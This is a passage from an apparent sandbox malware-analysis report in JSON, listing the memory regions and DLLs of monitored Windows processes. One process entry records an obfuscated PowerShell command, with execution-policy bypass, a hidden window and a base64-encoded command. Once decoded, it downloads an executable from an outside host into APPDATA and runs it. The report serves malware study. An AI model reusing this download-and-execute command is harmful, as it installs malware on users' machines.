"start_va": 1960574976, "type": "region", "version": 1 }, "end_va": 1960603647, "entry_point": 1960574976, "filename": "\\Windows\\SysWOW64\\winbrand.dll", "id": "region_785", "name": "winbrand.dll", "norm_filename": "c:\\windows\\syswow64\\winbrand.dll", "region_type": "memory_mapped_file", "start_va": 1960574976, "timestamp": "00:00:46.096", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_786", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:00:46.104", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_787", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:00:46.105", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_788", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:00:46.105", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_789", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:00:46.106", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_790", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:00:46.107", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_791", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:00:46.107", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_792", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:00:46.108", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_793", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:00:46.109", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_794", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:00:46.109", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_795", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:00:46.110", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_796", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:00:46.110", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_797", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:00:46.111", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_798", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:00:46.113", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_799", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:00:46.114", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000800-addr_0x0000000000660000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_192", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 6684672, "type": "region", "version": 1 }, "end_va": 6750207, "entry_point": 0, "filename": null, "id": "region_800", "name": "private_0x0000000000660000", "norm_filename": null, "region_type": "private_memory", "start_va": 6684672, "timestamp": "00:00:46.135", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 6750208, "type": "region", "version": 1 }, "end_va": 8355839, "entry_point": 0, "filename": null, "id": "region_801", "name": "pagefile_0x0000000000670000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6750208, "timestamp": "00:00:46.135", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_802", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:00:46.135", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_803", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:00:46.135", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_804", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:46.142", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 466943, "entry_point": 0, "filename": null, "id": "region_805", "name": "pagefile_0x0000000000070000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 458752, "timestamp": "00:00:46.142", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000806-addr_0x0000000000080000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_193", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 524288, "type": "region", "version": 1 }, "end_va": 528383, "entry_point": 0, "filename": null, "id": "region_806", "name": "private_0x0000000000080000", "norm_filename": null, "region_type": "private_memory", "start_va": 524288, "timestamp": "00:00:46.142", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000807-addr_0x00000000000d0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_194", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 856063, "entry_point": 0, "filename": null, "id": "region_807", "name": "private_0x00000000000d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 851968, "timestamp": "00:00:46.143", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 8388608, "type": "region", "version": 1 }, "end_va": 9965567, "entry_point": 0, "filename": null, "id": "region_808", "name": "pagefile_0x0000000000800000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8388608, "timestamp": "00:00:46.143", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 10027008, "type": "region", "version": 1 }, "end_va": 30998527, "entry_point": 0, "filename": null, "id": "region_809", "name": "pagefile_0x0000000000990000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10027008, "timestamp": "00:00:46.144", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 3420160, "start_va": 30998528, "type": "region", "version": 1 }, "end_va": 34418687, "entry_point": 0, "filename": null, "id": "region_810", "name": "pagefile_0x0000000001d90000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 30998528, "timestamp": "00:00:46.144", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 34471936, "type": "region", "version": 1 }, "end_va": 37416959, "entry_point": 34471936, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_811", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 34471936, "timestamp": "00:00:46.183", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "powershell.exe -ExeCUtIonPolIcY bypass -WINdowSTYLE hiddEn -ENCodedcOMMANd UABvAHcAZQByAFMAaABlAGwAbAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAcgBvAGYAaQBsAGUAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAG0AaQBuAGkAbQBpAHoAZQBkACAALQBjAG8AbQBtAGEAbgBkACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwB3AC0AcwB6AGMAegBlAGMAaQBuAC4AcABsAC8AaQBtAGcAMgAvAHMANQAwAC4AZQB4AGUAJwAsAB0gJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABuAHYAcwBzAC4AZQB4AGUAHSApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACgAHSAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAG4AdgBzAHMALgBlAHgAZQAdICkA \"", "filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe", "id": "proc_5", "image_name": "powershell.exe", "monitor_reason": "child_process", "monitored_id": 5, "origin_monitor_id": 4, "ref_parent_process": { "ref_id": "proc_4", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000005-region_00000812-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_195", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_812", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:46.209", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000813-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_196", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_813", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:00:46.210", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_814", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:00:46.210", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_815", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:00:46.213", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_816", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:00:46.213", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000817-addr_0x0000000000190000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_197", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1900543, "entry_point": 0, "filename": null, "id": "region_817", "name": "private_0x0000000000190000", "norm_filename": null, "region_type": "private_memory", "start_va": 1638400, "timestamp": "00:00:46.213", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000818-addr_0x0000000000240000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_198", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 2359296, "type": "region", "version": 1 }, "end_va": 2621439, "entry_point": 0, "filename": null, "id": "region_818", "name": "private_0x0000000000240000", "norm_filename": null, "region_type": "private_memory", "start_va": 2359296, "timestamp": "00:00:46.213", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 466944, "start_va": 563412992, "type": "region", "version": 1 }, "end_va": 563879935, "entry_point": 563412992, "filename": "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", "id": "region_819", "name": "powershell.exe", "norm_filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe", "region_type": "memory_mapped_file", "start_va": 563412992, "timestamp": "00:00:46.213", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_820", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:00:46.223", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_821", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:00:46.224", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_822", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:00:46.225", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000823-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_199", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_823", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:00:46.225", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000824-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_200", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_824", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:00:46.225", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000825-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_201", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_825", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:00:46.227", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_826", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:00:46.228", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000827-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_202", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_827", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:00:46.228", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_828", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:00:46.228", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000829-addr_0x0000000000070000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_203", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 983039, "entry_point": 0, "filename": null, "id": "region_829", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:00:46.236", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_830", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:00:46.236", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_831", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:00:46.237", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_832", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:00:46.238", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000833-addr_0x00000000774a0000-size_0x00000000000fa000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_204", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_833", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:00:46.238", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000834-addr_0x00000000775a0000-size_0x000000000011f000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_205", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_834", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:00:46.239", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_835", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:46.274", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_836", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:46.274", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 1404927, "entry_point": 983040, "filename": "\\Windows\\System32\\locale.nls", "id": "region_837", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 983040, "timestamp": "00:00:46.274", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000838-addr_0x0000000000280000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_206", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2621440, "type": "region", "version": 1 }, "end_va": 3670015, "entry_point": 0, "filename": null, "id": "region_838", "name": "private_0x0000000000280000", "norm_filename": null, "region_type": "private_memory", "start_va": 2621440, "timestamp": "00:00:46.293", "type": "region", "version": 1 }, { "dump": { "filename": 